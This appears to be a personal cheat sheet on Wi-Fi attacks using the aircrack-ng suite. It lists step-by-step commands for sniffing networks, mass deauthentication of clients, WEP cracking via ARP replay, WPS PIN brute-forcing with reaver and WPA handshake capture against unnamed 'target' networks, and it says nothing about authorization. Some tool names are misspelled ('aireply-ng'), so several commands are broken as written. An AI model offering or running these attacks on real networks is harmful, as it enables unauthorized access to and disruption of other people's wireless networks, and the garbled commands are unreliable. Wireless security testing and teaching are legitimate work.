man page: airodump-ng is used for packet capturing of raw 802.11 frames for the intent of using them with air‐ crack-ng. NOTE: Ctrl-c to exit. Syntax:

• General wireless packet sniffing is done with airodump-ng, part of the aircrack-ng suite.
• This will give you general information about the wireless networks around you.

Syntax:

airodump-ng [options] <interface name>

Must first enable monitor mode (see here). Then run (assuming interface name wlan0):

airodump-ng wlan0             # 2.4Ghz only, quicker
airodump-ng --band a wlan0    # 5Ghz, quicker
airodump-ng --band abg wlan0  # 5Ghz + 2.4Ghz, slower

Once you find a target network in the information provided by airodump, move on…

Here you specify the target network (BSSID + Channel) you want to play with…

Target One Specific Network: From the general sniff of all traffic you just did, copy the target BSSID and Channel number:

• Run it without –write filename if you just want to see the network and clients on that network.
• You will see two sections: the top is the network, the bottom shows the clients (“stations”) on the network.

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0

This creates files in your current working directory (filename*.*).

• .cap file: data captured (everything sent to and from target network)
• If the router is set to encrypt, all the data captured will be encrypted

Wireshark: use it to analyze the data you captured… open the .cap file.

Deauthentication Attack: Disconnect any client from any network…

Tool: aireplay-ng

aireplay-ng --deauth=10000000 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
# program     repeat lots        MAC: access point      MAC: client     wireless adapater

Option -a is the MAC address of the access point and -c the client machine on the network you are deauthenticating.

• Remember: to get a client MAC address, you run airodump-ng and specify the network in order to see all the clients. The clients show up in the second (lower) block of information, under STATION:

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X wlan0

This still may fail unless you are also running airodump-ng against the target network (the command just above).

• If your target is wired, you simply connect to it and you're in.
• If your target is wireless w/o encryption, you connect and you're in.
• If your target is wireless + encryption… you need to break in.

WEP: Wired Equivalent Privacy (Old & Easy)

Tool: aircrack-ng (used to crack WEP's Initialization Vector for the key stream)

• The IV is sent in plain text (24-bit randomly generated number)
• The IV is prepended (as a prefix) to the WEP key for decryption of packets
• IV + Key (password) = Key Stream

All you need to do is capture a bunch of packets (airodump-ng), analyze the captured IVs (aircrack-ng) and discover the WEP key.

1. Capture specific BSSID + Channel as above. Store capture in file.
   • The #DATA column shows the number of useful packets w/ unique WEP IVs.
   • The higher the number the more likely you'll be able to crack the key.
2. Run aircrack-ng against your airodump-ng capture (.cap) file.

aircrack-ng filename.cap

Take the key from aircrack (XX:XX:XX:XX:XX), remove the colons, and use that number to log into the network.

PROBLEM: If the network isn't busy enough, the #DATA will not increase enough.

SOLUTION: Generate your own traffic… force access point to generate new IVs.

• Run an “arpreplay” attack
• We cannot connect to the AP but we can associate with it.

TOOL: aireply-ng

1. Run airodump-ng against your target network (as above) in one term window:

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0

2. Associate with this network with aireply-ng in another term window:

aireply-ng --fakeauth 0 -a [MAC of target router] -h [MAC of wireless adapter] wlan0
# run fake authentication attack once ("0")

3. Now communicate with the network with which you are associated via aireply-ng:

• Inject packets into router to force it to generate new IVs.
• Use an ARP reply/request attack…
• THEORY: capture an ARP packet, re-transmit it thus forcing the router to produce another packet with new IV. Lather, rinse, repeat.

aireply-ng --arpreplay -b [MAC of target router] -h [MAC of wireless adapter] wlan0

4. Then run aircrack-ng (filename should be something like arpreplay-01.cap)

aircrack-ng filename.cap

The only difference is the ecryption method: WPA uses TKIP and WPA2 uses CCMP. The same methods will work with both WPA and WPA2.

Misconfiguration Exploit: WPS (allows clients to connect without the password).

• Originally provided to simplify connecting printers and other peripherals.
• “PBC”: Push Button Configuration (peripherals and router had a WPS button).
• Authenticates against an 8-digit PIN (8 numbers). Easy hack.
• Router, however, must be misconfigured to use PIN authentication, NOT the PBC.
• Check this first (since WPA/WPA2 are so difficult to crack).

1. TOOL: wash (display all networks with WPS enable). You may need to put your wireless interface into auto mode instead of monitor mode.

wash --interface wlan0     # if this errors out, do the following...
ifconfig wlan0 down        # or ifdown wlan0
iwconfig wlan0 mode auto
ifconfig wlan0 up          # or ifup wlan0
wash --interface wlan0     # remember to change mode back to monitor for the hacks

2. Associate with the network (as above)… set this up but DO NOT RUN IT YET…

aireply-ng --fakeauth 30 -a [MAC of target router] -h [MAC of wireless adapter] wlan0
# associate with the target network every 30 seconds

3. In another term window run reaver to brute force the PIN:

reaver --bssid [MAC of target router] --channel [#] --interface wlan0 -vvv --no-associate

4. Launch reaver and then your aireply-ng you set up but did not run.

• If WPS is not misconfigured or PBC is set… then this won't work. Move on…

WPA/WPA2 CRACKING: The only packets that can aid cracking are the handshake packets.

• These are 4 packets sent when a client connects to the network

1. Run airodump-ng against all reachable networks…

airodump-ng wlan0               # 2.4Ghz only, quicker
airodump-ng --band a wlan0      # 5Ghz, quicker
airodump-ng --band abg wlan0    # 5Ghz + 2.4Ghz, slower

2. Find your target router and run airodump-ng to dump data to a file…

airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write filename wlan0

3. Let it run and wait for the handshake to occur (someone to connect to router).

4. If you're impatient, deauthenticate a current user and he'll connect again, giving you the handshake you want.

aireplay-ng --deauth 4 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
# program     repeat 4x   MAC addr router      MAC addr client to disconnect

5. Use that WPA handshake value to get the key for the wireless network (see next).

We'll have some more goodies later…